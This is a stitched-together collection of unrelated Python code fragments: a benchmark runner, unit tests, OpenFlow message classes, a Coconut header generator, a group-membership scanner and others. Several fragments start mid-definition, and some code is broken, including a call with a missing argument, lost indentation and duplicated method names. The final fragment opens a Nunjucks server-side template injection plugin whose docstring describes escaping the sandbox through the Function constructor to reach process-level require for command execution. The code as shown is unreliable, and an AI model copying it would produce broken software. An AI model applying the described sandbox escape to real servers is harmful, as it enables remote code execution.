        benchmark_name: human-readable name used in logs and lookups.

    Raises:
        BenchmarkError: if no control object is provided.
    """
    if job_control is None:
        raise BenchmarkError('No control object received')
    self._docker_image = docker_image.DockerImage()
    self._control = job_control
    self._benchmark_name = benchmark_name
    self._mode_remote = self._control.remote
    self._build_envoy = False
    self._build_nighthawk = False
    # Use lazy %-style arguments throughout.  The original mixed an f-string
    # with a deferred %s argument, interpolating eagerly and lazily at once.
    log.debug('Running benchmark: %s %s [%s]',
              'Remote' if self._mode_remote else 'Local',
              self._benchmark_name, self)
def get_name(self) -> str:
    """Return the benchmark's configured name."""
    name = self._benchmark_name
    return name
def get_image(self) -> str:
    """Return the Envoy image name from the job control's images section."""
    images = self._control.images
    return images.envoy_image
def _verify_sources(self, images: proto_image.DockerImages) -> None:
    """Verify every required image is either supplied or buildable.

    Raises:
        BenchmarkError: when no sources are configured, a source has no
            identity, or an image that was not supplied cannot be built
            from any configured source repository.
    """
    source = self.get_source()
    if not source:
        raise BenchmarkError('No source configuration specified')

    # NightHawk needs both the benchmark and the binary image.
    nighthawk_missing = (not images.nighthawk_benchmark_image
                         or not images.nighthawk_binary_image)

    can_build_envoy = False
    can_build_nighthawk = False
    for source_def in source:
        # Every repository entry must declare what it builds.
        if source_def.identity == source_def.SRCID_UNSPECIFIED:
            raise BenchmarkError('No source identity specified')
        if source_def.identity == source_def.SRCID_ENVOY and not images.envoy_image:
            can_build_envoy = True
        if source_def.identity == source_def.SRCID_NIGHTHAWK and nighthawk_missing:
            can_build_nighthawk = True

    if not images.envoy_image and not can_build_envoy:
        raise BenchmarkError('No source specified to build Envoy image')
    if nighthawk_missing and not can_build_nighthawk:
        raise BenchmarkError('No source specified to build NightHawk image')
def is_remote(self) -> bool:
    """Return True when the benchmark is configured to run remotely."""
    remote = self._mode_remote
    return remote
def get_images(self) -> proto_image.DockerImages:
    """Return the Docker images section of the job control document."""
    control = self._control
    return control.images
def get_source(self) -> List[proto_source.SourceRepository]:
    """Return the source repositories configured for this benchmark."""
    control = self._control
    return control.source
def run_image(self, image_name: str, run_parameters: docker_image.DockerRunParameters) -> Union[bytearray, None]:
    """Run *image_name* with *run_parameters*, delegating to the docker
    helper; returns the container output or None."""
    runner = self._docker_image
    return runner.run_image(image_name, run_parameters)
def execute_benchmark(self) -> None: |
class SystemVerilogPackage(Generator, Jinja2):
    """Generate a SystemVerilog package with register-map definitions.

    Renders the ``sv_package.j2`` template to *path*, prefixing generated
    identifiers with the upper-cased *prefix*.
    """

    def __init__(self, rmap=None, path='regs_pkg.sv', prefix='CSR', **args):
        super().__init__(rmap, **args)
        self.path = path
        self.prefix = prefix

    def generate(self):
        """Validate the register map and render the package file."""
        self.validate()
        # Template context assembled in one literal.
        context = {
            'corsair_ver': __version__,
            'rmap': self.rmap,
            'prefix': self.prefix.upper(),
            'file_name': utils.get_file_name(self.path),
            'config': config.globcfg,
        }
        self.render_to_file('sv_package.j2', context, self.path)
def arithmetic_graph_fixer(skip: Set[str]) -> GraphFixer:
    """Build a graph fixer that applies all arithmetic node fixers (except
    those named in *skip*) ancestors-first, repeating until a fixpoint."""
    typer = LatticeTyper()

    def _arithmetic_graph_fixer(bmg: BMGraphBuilder) -> GraphFixerResult:
        # Order matters: the first fixer matching a node wins.
        candidates = [
            addition_fixer(bmg, typer),
            bool_arithmetic_fixer(bmg, typer),
            bool_comparison_fixer(bmg, typer),
            log1mexp_fixer(bmg, typer),
            logsumexp_fixer(bmg),
            multiary_addition_fixer(bmg),
            multiary_multiplication_fixer(bmg),
            neg_neg_fixer(bmg),
            negative_real_multiplication_fixer(bmg, typer),
            nested_if_same_cond_fixer(bmg),
            nested_matrix_scale_fixer(bmg),
            sum_fixer(bmg, typer),
            trivial_matmul_fixer(bmg, typer),
            unsupported_node_fixer(bmg, typer),
            identity_transpose_fixer(bmg, typer),
        ]
        active = [fixer for fixer in candidates if fixer.__name__ not in skip]
        arith = ancestors_first_graph_fixer(typer, node_fixer_first_match(active))
        return fixpoint_graph_fixer(arith)(bmg)

    return _arithmetic_graph_fixer
(IResourceProtocol)
class FileResourceProtocol(HasTraits):
    """Resource protocol serving files from the local filesystem."""

    def file(self, address):
        """Open *address* for binary reading.

        Raises NoSuchResourceError when the file does not exist; any other
        I/O failure propagates unchanged.
        """
        try:
            stream = open(address, 'rb')
        except IOError as e:
            if e.errno != errno.ENOENT:
                raise
            raise NoSuchResourceError(address)
        return stream
def TrashMenuItem(name, after, get_tracks_func=generic_get_tracks_func, trash_tracks_func=generic_trash_tracks_func, delete_tracks_func=generic_delete_tracks_func):
    """Build a "Move to Trash" menu item wired to the given track callbacks."""
    callback_args = [get_tracks_func, trash_tracks_func, delete_tracks_func]
    return menu.simple_menu_item(name, after, _('_Move to Trash'), 'user-trash',
                                 _on_trash_tracks, callback_args=callback_args)
_traitsui
class TestConfigureTraits(unittest.TestCase):
    """Tests for HasTraits.configure_traits, in particular the deprecated
    ``filename`` pickling behavior and the deprecated ``edit`` argument."""

    def setUp(self):
        self.toolkit = traitsui.api.toolkit()
        self.tmpdir = tempfile.mkdtemp()

    def tearDown(self):
        shutil.rmtree(self.tmpdir)
        del self.tmpdir
        del self.toolkit

    def test_simple_call(self):
        # Plain configure_traits should invoke the toolkit view exactly once.
        model = Model()
        with mock.patch.object(self.toolkit, 'view_application') as mock_view:
            model.configure_traits()
        self.assertEqual(mock_view.call_count, 1)

    def test_filename_but_no_file(self):
        # A nonexistent filename is created and the model pickled into it.
        model = Model(count=37)
        filename = os.path.join(self.tmpdir, 'nonexistent.pkl')
        self.assertFalse(os.path.exists(filename))
        with mock.patch.object(self.toolkit, 'view_application'):
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(filename=filename)
        self.assertTrue(os.path.exists(filename))
        with open(filename, 'rb') as pickled_object:
            unpickled = pickle.load(pickled_object)
        self.assertIsInstance(unpickled, Model)
        self.assertEqual(unpickled.count, model.count)

    def test_pickle_protocol(self):
        # The pickle written by configure_traits must use protocol 3.
        model = Model(count=37)
        filename = os.path.join(self.tmpdir, 'nonexistent.pkl')
        self.assertFalse(os.path.exists(filename))
        with mock.patch.object(self.toolkit, 'view_application'):
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(filename=filename)
        self.assertTrue(os.path.exists(filename))
        with open(filename, 'rb') as pickled_object_file:
            pickled_object = pickled_object_file.read()
        # Inspect the raw pickle stream: the first opcode carries the protocol.
        (opcode, arg, _) = next(pickletools.genops(pickled_object))
        self.assertEqual(opcode.name, 'PROTO')
        self.assertEqual(arg, 3)

    def test_filename_with_existing_file(self):
        # An existing pickle restores its state onto the model.
        stored_model = Model(count=52)
        filename = os.path.join(self.tmpdir, 'model.pkl')
        with open(filename, 'wb') as pickled_object:
            pickle.dump(stored_model, pickled_object)
        model = Model(count=19)
        with mock.patch.object(self.toolkit, 'view_application'):
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(filename=filename)
        self.assertEqual(model.count, 52)

    def test_filename_with_invalid_existing_file(self):
        # Corrupt pickle data propagates as a PickleError.
        filename = os.path.join(self.tmpdir, 'model.pkl')
        with open(filename, 'wb') as pickled_object:
            pickled_object.write(b'this is not a valid pickle')
        model = Model(count=19)
        with mock.patch.object(self.toolkit, 'view_application'):
            with self.assertRaises(pickle.PickleError):
                with self.assertWarns(DeprecationWarning):
                    model.configure_traits(filename=filename)

    def test_filename_with_existing_file_stores_updated_model(self):
        # Changes made while the view is open are pickled back to disk.
        stored_model = Model(count=52)
        filename = os.path.join(self.tmpdir, 'model.pkl')
        with open(filename, 'wb') as pickled_object:
            pickle.dump(stored_model, pickled_object)

        def modify_model(*args, **kwargs):
            # Simulates the user editing the model through the UI.
            model.count = 23
            return mock.DEFAULT

        model = Model(count=19)
        with mock.patch.object(self.toolkit, 'view_application') as mock_view:
            mock_view.side_effect = modify_model
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(filename=filename)
        self.assertEqual(model.count, 23)
        with open(filename, 'rb') as pickled_object:
            unpickled = pickle.load(pickled_object)
        self.assertIsInstance(unpickled, Model)
        self.assertEqual(unpickled.count, model.count)

    def test_edit_when_false(self):
        # edit=False suppresses the view (and is deprecated).
        model = Model()
        with mock.patch.object(self.toolkit, 'view_application') as mock_view:
            mock_view.return_value = True
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(edit=False)
        mock_view.assert_not_called()

    def test_edit_when_true(self):
        # edit=True shows the view (and is deprecated).
        model = Model()
        with mock.patch.object(self.toolkit, 'view_application') as mock_view:
            mock_view.return_value = True
            with self.assertWarns(DeprecationWarning):
                model.configure_traits(edit=True)
        mock_view.assert_called_once()

    def test_edit_not_given(self):
        # Omitting edit must not emit the "edit argument" deprecation warning.
        model = Model()
        with mock.patch.object(self.toolkit, 'view_application') as mock_view:
            mock_view.return_value = True
            with warnings.catch_warnings(record=True) as captured_warnings:
                warnings.simplefilter('always', DeprecationWarning)
                model.configure_traits()
        mock_view.assert_called_once()
        all_warnings = ''.join((str(warning.message) for warning in captured_warnings))
        self.assertNotIn('edit argument', all_warnings)
class DbMock(CommonDatabaseMock):
    """Database stub returning canned search results for the test fixtures."""

    def generic_search(search_dict: dict, skip: int = 0, limit: int = 0, only_fo_parent_firmware: bool = False, inverted: bool = False, as_meta: bool = False):
        """Return fixture UIDs matching *search_dict*.

        NOTE(review): defined without ``self`` — presumably a
        ``@staticmethod`` whose decorator is not visible here.
        """
        matches = []
        query_repr = str(search_dict)
        # The empty query matches the firmware fixture as well.
        if TEST_FW_2.uid in query_repr or search_dict == {}:
            matches.append(TEST_FW_2.uid)
        if TEST_TEXT_FILE.uid in query_repr:
            if not only_fo_parent_firmware:
                matches.append(TEST_TEXT_FILE.uid)
            elif TEST_FW_2.uid not in matches:
                # Parent-firmware mode maps the file hit to its firmware.
                matches.append(TEST_FW_2.uid)
        if as_meta:
            return [MetaEntry(uid, 'hid', {}, 0) for uid in matches]
        return matches
def shells_with_basis(atoms: Tuple, coords, basis=None, name=None, shells_cls=None, min_coeff=1e-08, **kwargs):
    """Construct a Shells object for *atoms* at *coords* from a basis set.

    Either *basis* (a parsed basis dict keyed by atomic number strings) or
    *name* (resolved via basis_from_json) must be given; when both are
    present, *name* wins.  Primitives whose absolute contraction coefficient
    is below *min_coeff* are dropped.
    """
    assert (basis is not None) or (name is not None)
    if shells_cls is None:
        shells_cls = Shells
    if name is not None:
        basis = basis_from_json(name)

    coords3d = np.reshape(coords, (len(atoms), 3))
    shells = []
    for center_ind, (atom, center) in enumerate(zip(atoms, coords3d)):
        atomic_num = str(ATOMIC_NUMBERS[atom.lower()])
        for bshell in basis[atomic_num]['electron_shells']:
            ang_moms = bshell['angular_momentum']
            if len(ang_moms) == 1:
                # A single angular momentum is shared by all contractions.
                ang_moms = it.cycle(ang_moms)
            exponents = np.array(bshell['exponents'], dtype=float)
            for ang_mom, coeffs in zip(ang_moms, bshell['coefficients']):
                coeffs = np.array(coeffs, dtype=float)
                keep = np.abs(coeffs) >= min_coeff
                shells.append(
                    Shell(L=ang_mom, center=center, coeffs=coeffs[keep],
                          exps=exponents[keep], atomic_num=atomic_num,
                          center_ind=center_ind)
                )
    return shells_cls(shells, **kwargs)
def calc():
    """Create a ConicalIntersection calculator from two ORCA5 jobs:
    the ground state and the first TD-DFT excited state (numerical freqs)."""
    common = {'keywords': 'b3lyp def2-svp', 'pal': 6, 'calc_number': 0}
    ground_state = ORCA5(**common)
    # Excited-state job shares the settings but adds TD-DFT and its own number.
    excited_kwargs = dict(common,
                          numfreq=True,
                          blocks='%tddft iroot 1 nroots 1 end',
                          calc_number=1)
    excited_state = ORCA5(**excited_kwargs)
    return ConicalIntersection(ground_state, excited_state)
def test_generate_gpu_of_a_simple_model(create_test_data, store_local_session, create_pymel, create_maya_env):
    """GPU representation generation should produce an openable version
    whose known node ('duvarlar') has a gpuCache shape."""
    data = create_test_data
    pm = create_pymel
    maya_env = create_maya_env
    # Generate the GPU repr for the base model version.
    gen = RepresentationGenerator(version=data['building1_yapi_model_main_v003'])
    gen.generate_gpu()
    # Look up the generated GPU version and open it.
    r = Representation(version=data['building1_yapi_model_main_v003'])
    v = r.find('GPU')
    maya_env.open(v, force=True)
    # The wall node must exist and be backed by a gpuCache shape.
    node = pm.PyNode('duvarlar')
    assert (node is not None)
    assert (node.getShape().type() == 'gpuCache')
class meter_config_stats_reply(stats_reply):
    """OpenFlow meter-config stats reply (generated loxi-style class).

    NOTE(review): pack() mixes ``struct.pack`` results with the str
    ``'\\x00' * 4`` and joins with ``''`` — presumably Python 2 era
    generated code; under Python 3 this would fail. Left untouched.
    """
    # Wire constants: OF version 1.5 (6), OFPT_STATS_REPLY-style type,
    # meter-config stats subtype.
    version = 6
    type = 19
    stats_type = 10

    def __init__(self, xid=None, flags=None, entries=None):
        if (xid != None):
            self.xid = xid
        else:
            self.xid = None
        if (flags != None):
            self.flags = flags
        else:
            self.flags = 0
        if (entries != None):
            self.entries = entries
        else:
            self.entries = []
        return

    def pack(self):
        """Serialize the message; length is back-patched after packing."""
        packed = []
        packed.append(struct.pack('!B', self.version))
        packed.append(struct.pack('!B', self.type))
        packed.append(struct.pack('!H', 0))  # placeholder for length (slot 2)
        packed.append(struct.pack('!L', self.xid))
        packed.append(struct.pack('!H', self.stats_type))
        packed.append(struct.pack('!H', self.flags))
        packed.append(('\x00' * 4))  # 4 bytes of padding
        packed.append(loxi.generic_util.pack_list(self.entries))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack('!H', length)
        return ''.join(packed)

    def unpack(reader):
        """Parse a message from *reader*; asserts the fixed header fields.

        NOTE(review): no ``self``/``cls`` — presumably a ``@staticmethod``
        whose decorator is not visible here.
        """
        obj = meter_config_stats_reply()
        _version = reader.read('!B')[0]
        assert (_version == 6)
        _type = reader.read('!B')[0]
        assert (_type == 19)
        _length = reader.read('!H')[0]
        # Constrain further reads to this message's declared length.
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read('!L')[0]
        _stats_type = reader.read('!H')[0]
        assert (_stats_type == 10)
        obj.flags = reader.read('!H')[0]
        reader.skip(4)  # padding
        obj.entries = loxi.generic_util.unpack_list(reader, ofp.common.meter_config.unpack)
        return obj

    def __eq__(self, other):
        if (type(self) != type(other)):
            return False
        if (self.xid != other.xid):
            return False
        if (self.flags != other.flags):
            return False
        if (self.entries != other.entries):
            return False
        return True

    def pretty_print(self, q):
        """Write a human-readable rendering to pretty-printer *q*."""
        q.text('meter_config_stats_reply {')
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text('xid = ')
                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REPLY_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('entries = ')
                q.pp(self.entries)
            q.breakable()
        q.text('}')
class OptionSeriesWindbarbSonificationDefaultspeechoptionsMappingPlaydelay(Options):
    """Play-delay mapping options for windbarb sonification speech tracks.

    Each option appears as a getter/setter pair sharing one name; the
    ``@property`` / ``@<name>.setter`` decorators were presumably stripped
    during extraction — TODO confirm against the original generated file.
    """

    def mapFunction(self):
        # Mapping function; default None.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Data property to map the play delay to; default None.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Upper bound of the mapped range; default None.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Lower bound of the mapped range; default None.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # Scope the mapping is computed within; default None.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
()
def getheader(which, use_hash, target, no_tco, strict, no_wrap):
    """Produce the Coconut compiled-file header of kind *which*.

    *which* is one of 'none', 'initial', '__coconut__', 'sys', 'code',
    'file' or a 'package:<levels>' spec; *target* selects the Python
    version the output must support.  Returns the header source as a string.
    """
    internal_assert((which.startswith('package') or (which in ('none', 'initial', '__coconut__', 'sys', 'code', 'file'))), 'invalid header type', which)
    if (which == 'none'):
        return ''
    target_info = get_target_info(target)
    # Version/target/strict tuple embedded so stale packages can be detected.
    header_info = tuple_str_of((VERSION, target, strict), add_quotes=True)
    format_dict = process_header_args(which, use_hash, target, no_tco, strict, no_wrap)
    if ((which == 'initial') or (which == '__coconut__')):
        # Shebang + encoding + hash line only belong at the very top of a file.
        header = '#!/usr/bin/env python{target_major}\n# -*- coding: {default_encoding} -*-\n{hash_line}{typing_line}\n# Compiled with Coconut version {VERSION_STR}\n\n{module_docstring}'.format(**format_dict)
    elif (use_hash is not None):
        raise CoconutInternalException('can only add a hash to an initial or __coconut__ header, not', which)
    else:
        header = ''
    if (which == 'initial'):
        return header
    header += section('Coconut Header', newline_before=False)
    # __future__ imports depend on the targeted Python version.
    if (not target.startswith('3')):
        header += 'from __future__ import print_function, absolute_import, unicode_literals, division\n'
    elif (target_info >= (3, 13)):
        # NOTE(review): 3.13+ deliberately omits the annotations future
        # import that 3.7-3.12 get (unless no_wrap) — confirm intent.
        header += 'from __future__ import generator_stop\n'
    elif (target_info >= (3, 7)):
        if no_wrap:
            header += 'from __future__ import generator_stop\n'
        else:
            header += 'from __future__ import generator_stop, annotations\n'
    elif (target_info >= (3, 5)):
        header += 'from __future__ import generator_stop\n'
    header += 'import sys as _coconut_sys\nimport os as _coconut_os\n'
    if (which.startswith('package') or (which == '__coconut__')):
        header += (('_coconut_header_info = ' + header_info) + '\n')
    levels_up = None
    if which.startswith('package'):
        # 'package:N' headers must locate the package root N directories up.
        levels_up = int(assert_remove_prefix(which, 'package:'))
        coconut_file_dir = '_coconut_os.path.dirname(_coconut_os.path.abspath(__file__))'
        for _ in range(levels_up):
            coconut_file_dir = (('_coconut_os.path.dirname(' + coconut_file_dir) + ')')
        header += prepare('\n_coconut_cached__coconut__ = _coconut_sys.modules.get({__coconut__})\n_coconut_file_dir = {coconut_file_dir}\n_coconut_pop_path = False\nif _coconut_cached__coconut__ is None or getattr(_coconut_cached__coconut__, "_coconut_header_info", None) != _coconut_header_info and _coconut_os.path.dirname(_coconut_cached__coconut__.__file__ or "") != _coconut_file_dir:\n    if _coconut_cached__coconut__ is not None:\n        _coconut_sys.modules[{_coconut_cached__coconut__}] = _coconut_cached__coconut__\n        del _coconut_sys.modules[{__coconut__}]\n    _coconut_sys.path.insert(0, _coconut_file_dir)\n    _coconut_pop_path = True\n    _coconut_module_name = _coconut_os.path.splitext(_coconut_os.path.basename(_coconut_file_dir))[0]\n    if _coconut_module_name and _coconut_module_name[0].isalpha() and all(c.isalpha() or c.isdigit() for c in _coconut_module_name) and "__init__.py" in _coconut_os.listdir(_coconut_file_dir):\n        _coconut_full_module_name = str(_coconut_module_name + ".__coconut__")\n        import __coconut__ as _coconut__coconut__\n        _coconut__coconut__.__name__ = _coconut_full_module_name\n        for _coconut_v in vars(_coconut__coconut__).values():\n            if getattr(_coconut_v, "__module__", None) == {__coconut__}:\n                try:\n                    _coconut_v.__module__ = _coconut_full_module_name\n                except AttributeError:\n                    _coconut_v_type = type(_coconut_v)\n                    if getattr(_coconut_v_type, "__module__", None) == {__coconut__}:\n                        _coconut_v_type.__module__ = _coconut_full_module_name\n        _coconut_sys.modules[_coconut_full_module_name] = _coconut__coconut__\nfrom __coconut__ import *\nfrom __coconut__ import {underscore_imports}\nif _coconut_pop_path:\n    _coconut_sys.path.pop(0)\n    ', newline=True).format(coconut_file_dir=coconut_file_dir, **format_dict)
    if (which == 'sys'):
        header += 'from coconut.__coconut__ import *\nfrom coconut.__coconut__ import {underscore_imports}\n'.format(**format_dict)
    # Normalize __file__ and strip the coconut cache dir from its path.
    header += prepare('\ntry:\n    __file__ = _coconut_os.path.abspath(__file__) if __file__ else __file__\nexcept NameError:\n    pass\nelse:\n    if __file__ and {coconut_cache_dir} in __file__:\n        _coconut_file_comps = []\n        while __file__:\n            __file__, _coconut_file_comp = _coconut_os.path.split(__file__)\n            if not _coconut_file_comp:\n                _coconut_file_comps.append(__file__)\n                break\n            if _coconut_file_comp != {coconut_cache_dir}:\n                _coconut_file_comps.append(_coconut_file_comp)\n        __file__ = _coconut_os.path.join(*reversed(_coconut_file_comps))\n    ', newline=True).format(**format_dict)
    if ((which == 'sys') or which.startswith('package')):
        return (header + section('Compiled Coconut'))
    internal_assert((which in ('__coconut__', 'code', 'file')), 'wrong header type', which)
    header += prepare('\n_coconut_cached__coconut__ = _coconut_sys.modules.get({_coconut_cached__coconut__}, _coconut_sys.modules.get({__coconut__}))\n    ', newline=True).format(**format_dict)
    # Pick the most specific runtime-root header the target supports.
    header += _get_root_header(('311' if (target_info >= (3, 11)) else ('39' if (target_info >= (3, 9)) else ('37' if (target_info >= (3, 7)) else ('3' if target.startswith('3') else ('27' if (target_info >= (2, 7)) else ('2' if target.startswith('2') else 'universal')))))))
    header += get_template('header').format(**format_dict)
    if (which == 'file'):
        header += section('Compiled Coconut')
    return header
class BanOrmModel(OrmModelBase):
    """ORM model for a ban record (single IPv4 address or a range)."""
    __tablename__ = 'ban'

    id = Column(Integer(), primary_key=True)
    # IPv4 addresses stored as integers; ip4_end is set only for range bans.
    ip4 = Column(BigInteger(), nullable=False, index=True)
    ip4_end = Column(BigInteger(), nullable=True, index=True)
    reason = Column(String(), nullable=False)
    # Start time and duration, stored as integers
    # (presumably epoch seconds or ms — TODO confirm against callers).
    date = Column(BigInteger(), nullable=False)
    length = Column(BigInteger, nullable=False)
    # Optional scoping: a specific board and/or the post that triggered the ban.
    board = Column(String(), nullable=True, index=True)
    post = Column(Integer(), ForeignKey('post.id'), nullable=True)
    # Moderator who issued the ban, when known.
    moderator_id = Column(Integer(), ForeignKey('moderator.id'), nullable=True, index=True)
def _switch_no_empty_fallthrough(task) -> Tuple[(Variable, List[BasicBlock])]:
    """Build a CFG fixture: a 0-9 digit switch in which several case blocks
    fall through to the next case (no empty fallthrough cases).

    Populates ``task.graph`` with the blocks/edges and returns the switch
    variable together with the vertex list.

    NOTE(review): ``scanf_call(var_1, , 2)`` below is missing its second
    argument and is syntactically invalid — presumably a constant was lost
    during extraction; restore it from the original test fixture.
    """
    var_1 = Variable('var_1', Pointer(Integer(32, True), 32), None, False, Variable('var_28', Pointer(Integer(32, True), 32), 1, False, None))
    var_0 = Variable('var_0', Integer(32, True), None, True, Variable('var_10', Integer(32, True), 0, True, None))
    # Block 0: prompt + scanf + bounds check; block 2: the indirect switch.
    task.graph.add_nodes_from((vertices := [BasicBlock(0, [Assignment(ListOperation([]), print_call('Enter a digit (0-9): ', 1)), Assignment(var_1, UnaryOperation(OperationType.address, [var_0], Pointer(Integer(32, True), 32), None, False)), Assignment(ListOperation([]), scanf_call(var_1, , 2)), Branch(Condition(OperationType.greater_us, [var_0, Constant(9, Integer(32, True))], CustomType('bool', 1)))]), BasicBlock(1, [Assignment(ListOperation([]), print_call('Not a digit ', 3))]), BasicBlock(2, [IndirectBranch(var_0)]), BasicBlock(3, [Return(ListOperation([Constant(0, Integer(32, True))]))]), BasicBlock(4, [Assignment(ListOperation([]), putchar_call(48, 4))]), BasicBlock(5, [Assignment(ListOperation([]), putchar_call(49, 6))]), BasicBlock(6, [Assignment(ListOperation([]), putchar_call(50, 7))]), BasicBlock(7, [Assignment(ListOperation([]), putchar_call(51, 9))]), BasicBlock(8, [Assignment(ListOperation([]), putchar_call(52, 11))]), BasicBlock(9, [Assignment(ListOperation([]), putchar_call(53, 12))]), BasicBlock(10, [Assignment(ListOperation([]), putchar_call(54, 14))]), BasicBlock(11, [Assignment(ListOperation([]), putchar_call(55, 16))]), BasicBlock(12, [Assignment(ListOperation([]), putchar_call(56, 18))]), BasicBlock(13, [Assignment(ListOperation([]), putchar_call(57, 20))])]))
    # Switch cases 0-9 plus the fallthrough chains (e.g. case 0 -> case 1).
    task.graph.add_edges_from([TrueCase(vertices[0], vertices[1]), FalseCase(vertices[0], vertices[2]), UnconditionalEdge(vertices[1], vertices[3]), SwitchCase(vertices[2], vertices[4], [Constant(0, Integer(32))]), SwitchCase(vertices[2], vertices[5], [Constant(1, Integer(32))]), SwitchCase(vertices[2], vertices[6], [Constant(2, Integer(32))]), SwitchCase(vertices[2], vertices[7], [Constant(3, Integer(32))]), SwitchCase(vertices[2], vertices[8], [Constant(4, Integer(32))]), SwitchCase(vertices[2], vertices[9], [Constant(5, Integer(32))]), SwitchCase(vertices[2], vertices[10], [Constant(6, Integer(32))]), SwitchCase(vertices[2], vertices[11], [Constant(7, Integer(32))]), SwitchCase(vertices[2], vertices[12], [Constant(8, Integer(32))]), SwitchCase(vertices[2], vertices[13], [Constant(9, Integer(32))]), UnconditionalEdge(vertices[4], vertices[5]), UnconditionalEdge(vertices[5], vertices[3]), UnconditionalEdge(vertices[6], vertices[7]), UnconditionalEdge(vertices[7], vertices[8]), UnconditionalEdge(vertices[8], vertices[3]), UnconditionalEdge(vertices[9], vertices[10]), UnconditionalEdge(vertices[10], vertices[11]), UnconditionalEdge(vertices[11], vertices[12]), UnconditionalEdge(vertices[12], vertices[13]), UnconditionalEdge(vertices[13], vertices[3])])
    return (var_0, vertices)
def _string_to_bool(s: (str | None)):
if (s is None):
return None
s = s.lower()
if (s in ['y', 'yes', 't', 'true']):
return True
if (s in ['n', 'no', 'f', 'false']):
return False
raise Exception(f"Invalid argument '{s}', should be a bool value: y/yes/n/no/t/true/f/false.") |
class GroupsScanner(base_scanner.BaseScanner):
def _flatten_violations(violations):
for violation in violations:
violation_data = {'violated_rule_names': violation.violated_rule_names, 'member_email': violation.member_email, 'member_id': violation.member_id, 'member_status': violation.member_status, 'member_type': violation.member_type, 'parent_email': violation.parent.member_email, 'parent_id': violation.parent.member_id, 'parent_status': violation.parent.member_status, 'parent_resource_type': violation.parent.member_type}
full_name = ((violation.parent.member_id + ':') + violation.member_id)
(yield {'resource_id': violation.member_email, 'resource_name': violation.member_email, 'resource_type': 'group_member', 'full_name': full_name, 'rule_index': None, 'rule_name': violation.violated_rule_names, 'violation_type': 'GROUP_VIOLATION', 'violation_data': violation_data, 'resource_data': violation.resource_data})
def _output_results(self, all_violations):
all_violations = self._flatten_violations(all_violations)
self._output_results_to_db(all_violations)
def _find_violations(root):
all_violations = []
for node in anytree.iterators.PreOrderIter(root):
if (node.member_email == MY_CUSTOMER):
continue
if (not node.member_email):
continue
if (not node.rules):
continue
node.violated_rule_names = []
whitelist_rule_statuses = []
for rule in node.rules:
condition_statuses = []
if (rule.get('mode') == 'whitelist'):
for condition in rule.get('conditions'):
if (condition.get('member_email') in node.member_email):
condition_statuses.append(True)
else:
condition_statuses.append(False)
if any(condition_statuses):
whitelist_rule_statuses.append(True)
else:
whitelist_rule_statuses.append(False)
node.violated_rule_names.append(rule.get('name'))
elif (rule.get('mode') == 'blacklist'):
pass
elif (rule.get('mode') == 'required'):
pass
else:
pass
if (not any(whitelist_rule_statuses)):
all_violations.append(node)
return all_violations
def _apply_one_rule(starting_node, rule):
for node in anytree.iterators.PreOrderIter(starting_node):
node.rules.append(rule)
return starting_node
def _apply_all_rules(self, starting_node, group_rules):
for rule in group_rules:
if (rule.get('group_email') == MY_CUSTOMER):
starting_node = self._apply_one_rule(starting_node, rule)
else:
for node in anytree.iterators.PreOrderIter(starting_node):
if (node.member_email == rule.get('group_email')):
self._apply_one_rule(node, rule)
break
return starting_node
def _get_recursive_members(self, starting_node):
model_manager = self.service_config.model_manager
(scoped_session, data_access) = model_manager.get(self.model_name)
with scoped_session as session:
members = data_access.expand_members(session, [starting_node.member_id])
for member in members:
MemberNode(member.name, member.member_name, member.type, 'ACTIVE', starting_node)
def _build_group_tree(self):
root = MemberNode(MY_CUSTOMER, MY_CUSTOMER)
model_manager = self.service_config.model_manager
(scoped_session, data_access) = model_manager.get(self.model_name)
with scoped_session as session:
all_groups = data_access.iter_groups(session)
for group in all_groups:
group_node = MemberNode(group.name, group.member_name, group.type, 'ACTIVE', root)
self._get_recursive_members(group_node)
LOGGER.debug(anytree.RenderTree(root, style=anytree.AsciiStyle()).by_attr('member_email'))
return root
def _retrieve(self):
    """Fetch the data to scan: the customer's group-membership tree.

    Returns:
        Root MemberNode of the group tree.
    """
    return self._build_group_tree()
def run(self):
    """Scanner entry point: build the tree, apply rules, report violations."""
    tree = self._retrieve()
    rules = file_loader.read_and_parse_file(self.rules)
    tree = self._apply_all_rules(tree, rules)
    violations = self._find_violations(tree)
    self._output_results(violations)
class Nunjucks(javascript.Javascript):
    """SSTI detection/exploitation plugin for the Nunjucks (Node.js) template engine.

    Registers the payload templates used to render, read, write, evaluate and
    execute through an injection point, plus the context-escape sequences used
    to break out of surrounding template constructs. The payloads escape the
    template sandbox via ``range.constructor`` (the JS Function constructor)
    to reach ``global.process.mainModule.require``.
    """

    def init(self):
        """Register Nunjucks-specific actions and injection contexts.

        All payload values below are runtime strings sent to the target and
        are kept verbatim.
        """
        # Action payload templates, keyed by capability.
